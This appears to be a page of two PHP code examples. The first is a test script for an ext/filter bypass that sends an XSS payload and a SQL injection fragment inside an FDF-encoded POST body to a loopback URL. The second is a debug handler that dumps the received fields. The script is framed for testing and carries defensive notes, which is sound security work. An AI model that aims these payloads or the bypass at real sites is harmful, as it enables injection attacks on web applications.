Пример #1
////////////////////////////////////////////////////////////////////////
//         PHP ext/filter FDF POST filter bypass: test script         //
////////////////////////////////////////////////////////////////////////
// Purpose (per the title): check whether request fields delivered as an
// FDF document (Content-Type: application/vnd.fdf) are handed to the
// receiving script without going through ext/filter.
//
// The script packs the entries of $_POST into an FDF file, sends that file
// as the body of an HTTP POST to $url and prints whatever the server
// answers. Assuming the target page echoes the input it received, marker
// values coming back unchanged mean no input filter was applied to this
// body type.
//
// NOTE(review): for defenders the takeaway is not to treat a globally
// configured input filter as the only control. Validate and encode each
// value where it is used, and keep the fdf extension disabled on hosts
// that do not process FDF forms.

// Safety stop: nothing below runs until this line is deleted by hand. The
// original author describes it as a protection against remote file
// inclusion of this script.
die("REMOVE THIS LINE");

// Fields to submit. $_POST is reused here purely as a container for the
// outgoing data; it is not the incoming request of this script.
$_POST = [
    'var1' => "<script>alert(/XSS/);</script>",
    'var2' => " ' UNION SELECT ",
];

// Endpoint that receives the FDF-encoded request (loopback by default).
$url = "http://127.0.0.1/info.php";

// ---- nothing below needs to be edited ----

// Serialise the fields into an FDF document. The file is written to the
// current working directory under a fixed name and removed again once its
// contents have been read back.
$fdfDoc = fdf_create();
foreach ($_POST as $field => $payload) {
    fdf_set_value($fdfDoc, $field, $payload, 0);
}
fdf_save($fdfDoc, "outtest.fdf");
fdf_close($fdfDoc);

$body = file_get_contents("outtest.fdf");
unlink("outtest.fdf");

// HTTP stream context: POST the raw FDF bytes with the FDF media type.
$httpOptions = [
    'method'  => 'POST',
    'content' => $body,
    'header'  => 'Content-Type: application/vnd.fdf',
];
$ctx = stream_context_create(['http' => $httpOptions]);

// Warnings from fopen() are suppressed; a failed connection shows up only
// through the die() message below.
$stream = @fopen($url, 'rb', false, $ctx);
if ($stream === false) {
    die("Cannot open {$url}");
}

// Print the server's answer followed by a newline.
echo @stream_get_contents($stream);
echo "\n";
?>
 
Пример #2
<?php

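// Debug aid: dump the submitted POST fields, copy the dump to the error
// log, send it back to the client and stop. While this section is present
// the FDF reply further down is never produced.
ob_start();
var_dump($_POST);
$content = ob_get_clean();

// NOTE(review): the dump is raw request data. Anything a client submits
// (including secrets or control characters) ends up in the error log, so
// this is for local debugging only and should be removed before deployment.
error_log($content);

// The dump contains client-controlled strings. Serve it as plain text and
// forbid content sniffing so a browser cannot render submitted markup as
// HTML.
header('Content-Type: text/plain; charset=UTF-8');
header('X-Content-Type-Options: nosniff');
print $content;
die;

// Unreachable until the debug section above (ending in die) is removed.
// Output an empty FDF file carrying only a status message.
$outfdf = fdf_create();
$tmpname = tempnam('../temp', "FDF_");
if ($tmpname === false) {
    // Without a temp file there is nothing to save or stream back.
    fdf_close($outfdf);
    die('Cannot create temporary FDF file');
}
fdf_set_status($outfdf, "Thank you!");
fdf_save($outfdf, $tmpname);
fdf_close($outfdf);

// fdf_header() emits the HTTP headers for an FDF response; the saved
// document is then streamed to the client and the temp file removed.
fdf_header();
$fp = fopen($tmpname, "r");
if ($fp !== false) {
    fpassthru($fp);
    fclose($fp); // release the handle before deleting the file
}
unlink($tmpname);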